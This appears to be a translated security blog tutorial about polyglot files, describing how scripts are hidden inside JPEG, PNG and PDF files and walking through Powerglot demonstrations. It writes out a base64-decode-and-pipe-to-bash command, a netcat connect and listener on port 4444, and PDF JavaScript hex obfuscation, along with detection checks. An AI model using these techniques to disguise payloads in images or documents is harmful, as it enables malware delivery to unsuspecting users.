Polyglot files or how a picture with a cat will become a threat to the security of your information

Of course, a security threat sounds very pathetic, especially for a cute cat looking at you from a JPEG image, but a malicious script could easily get lost among its bytes. Let’s see what’s what.

What are polyglots and how do they work

A polyglot file is a file that changes its type depending on the context of use. To better understand the essence, we can give the following example – a JPEG image file, which also contains an exploit for scanning information about a computer on Linux. And depending on the way this polyglot is used, its type will also change, this is achieved by saving signature bytes, with the help of which various systems are able to determine the file extension.
Some examples of signature bytes:

The main set of polyglots contains code written in one programming language. Most often, they are used to bypass file extension-based protection – the user is more likely to be able to download a file with a JPEG, PNG, and PDF extension than with potentially dangerous JS, SH, and HTML.

You can read more about polyglots, for example Here or Here.

Principles for creating polyglots of various formats

Since each file extension has a unique structure and key, important elements that must be present, each type has its own way of injecting exploits. I will not consider format structures, but will only touch on how code is injected, but if someone is still interested in how they work, here are excellent articles on Habré about some of them:
– JPEG decoding for dummies
– PNG – not GIF!

JPEG format

When hiding exploits in JPEG, a method of changing the structure is used, which consists in changing the length value (length) by the required number of bytes.
Primary file structure:

Sample original content

Sample original content

After changing the value in the file, an additional place appears in which the exploit can be placed:

Changed content example

Changed content example

PNG format

Due to the fact that the PNG file structure is a sequence of chunks, basically, to hide the necessary information, the method of adding a new chunk after IHDR is used. Primary file structure:

Structure before change

Structure before change

It is necessary to add a tEXt chunk that allows you to write hidden information into it, in our case a JS + HTML exploit:

Structure after change

Structure after change

PDF format

Various string editing methods are often used. Usually, each line is enclosed in parentheses, but nothing prevents an attacker from writing it as a “column” or replacing each character of a line with its octal or hexadecimal representation, and numbers can be separated by spaces an unlimited number of times.

Also, in PDF, you can “hide” JS exploits using /JavaScript /JS objects, which themselves can contain executable code, or can be sent to another JS object.

In addition to the above methods for hiding exploits, you can obfuscate the code using hex sequences, in which, for example, /JavaScript can become /J#61#76#61Script. (When converting from hex to text, we get a = 61, v = 76, a = 61)

Working with polyglots

After a brief theoretical part, you can move on to exciting practice.
Now we will try to create and open polyglots in various ways, as well as analyze files for polyglot signatures.

For clarity and clarity, the chapter is divided into paragraphs with the names of combined extensions, inside of which there are steps for creating *, launching and detecting * polyglots.

* – During the creation and detection of polyglots, the utility will be used powerglot

PDF+Bash

Making a polyglot

First step – working with a script. We select the necessary exploit based on the Bash language (I will use the script – Local Linux Enumeration & Privilege Escalation Script, it is in the files of the powerglot utility), encode it with base64 and write it into an .sh executable file.

base64 ./расположение/скрипта -w 0 > b64.sh
Exploit encoding in base64

Exploit encoding in base64

Now we need to edit the contents of the file so that the base64 code can be decoded into source code and executed with the bash command. To do this, we need to wrap the encoded chain in the following commands:

echo “здесь располагается скрипт в base64“ | base64 -d | bash;
  • echo – send content to the terminal;

  • base 64 -d – decode from base64;

  • bash – run script.

This is what the result should look like:

Contents of the edited script file

Contents of the edited script file

Second step – merging the edited script and PDF. This action is carried out using the Powerglot utility function:

python3 powerglot.py -o ./путь_1/b64.sh ./путь_2/test.PDF OUTPUT
  • the -o switch is the function of encoding the script to a file;

  • ./path_1/b64.sh – path to the script;

  • ./path_2/test.PDF – path to the file where the script is encoded, in this case, with the PDF extension;

  • OUTPUT – the name of the file with the script encoded in it (result),
    its extension depends on the file it was encoded into.

After that, we get a ready-made polyglot who already knows something.

Checking and running a polyglot

In the figure, you can see that when opening the PDF file and viewing it using commands in the terminal, no anomalies were found.

Initial examination of a polyglot

Initial examination of a polyglot

The operation of the script from the polyglot is caused by opening it in the terminal (previously giving the file permission to run).

The operation of the exploit displays detailed information about the host in the console –
OS, file system, installed programs and so on.

Launching PDF Polyglot

Launching PDF Polyglot

In addition to everything done above, the Powerglot utility has a polyglot detection function, checking certain bytes of information against known patterns, which may contain suspicious content, and is also able to separate stegosploits (stegosploit – a topic for a separate article) from ordinary polyglots, the function is shown in the figure below. But if the directory is checked after the creation of a PDF polyglot, the program does not fix it as a malicious file, although it created it itself.

Running Powerglot Polyglot Detection

Running Powerglot Polyglot Detection

JPEG+Bash

Making a polyglot

First step – similar to the process of creating a PDF polyglot, you need to prepare an exploit. Let’s create a simple executable file that connects the host that opened our polyglot to the server and makes it possible to send messages between them. This is possible thanks to the netcat command line utility. It allows you to send and receive data over network connections using network protocols.

Let’s move on to creating an exploit:

echo "nc 127.0.0.1 4444" > netcat.sh
  • echo – send content to the terminal;

  • nc 127.0.0.1 4444 – connection using the netcat (nc) utility to the server, in this case to itself, through port number 4444;

  • key > – redirects the sending of the content by the echo command from the terminal to a file;

  • netcat.sh is the result of creating a file containing the exploit.

Second step – merging the resulting exploit with a JPEG file. As with creating a PDF polyglot, let’s use the Powerglot utility:

python3 powerglot.py -o ./путь_1/nc.sh ./путь_2/cat.jpg OUTPUT
  • the -o switch is the function of encoding the script to a file;

  • ./path_1/nc.sh – path to the script;

  • ./path_2/cat.jpg – path to the file where the script is encoded, in this case, with the JPEG extension;

  • OUTPUT – the name of the file with the script encoded into it (result), its extension depends on the file into which the encoding was performed.

Checking and running a polyglot

It can be seen that the resulting image has no interference or anomalies.

Opening a polyglot based on a JPEG image

Opening a polyglot based on a JPEG image

To check the result, you need to run a simple “server” to receive and send messages on port 4444:

nc -nvlp 4444

Now, by running the polyglot in the terminal, we get connectivity between the host and the server, and we can exchange messages. This does not do much harm, but the very concept and principle of operation shows what polyglots can be capable of.

Run jpeg polyglot

Run jpeg polyglot

Starting the

Starting the “server”

This time, the polyglot detection program marked our newly created polyglot as suspicious.

Conclusion

Polyglots are an interesting concept of information security threat. They are definitely able to take advantage of non-vigilant users, but most likely modern means of protection will not allow them to roam widely.

You can experiment with polyglots for a long time and even try to find a useful application for them, which will not shine for you in 273 articles. 😉

In continuation of this topic, we can consider stegosploits, these are polyglots created due to the fact that a browser exploit is steganographically encoded into a JPG or PNG image, then the resulting file is “merged” with an HTML page containing a JS decoder of the exploit encoded into an image, turning the file into HTML +Image polyglot….

But that’s a completely different story!

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *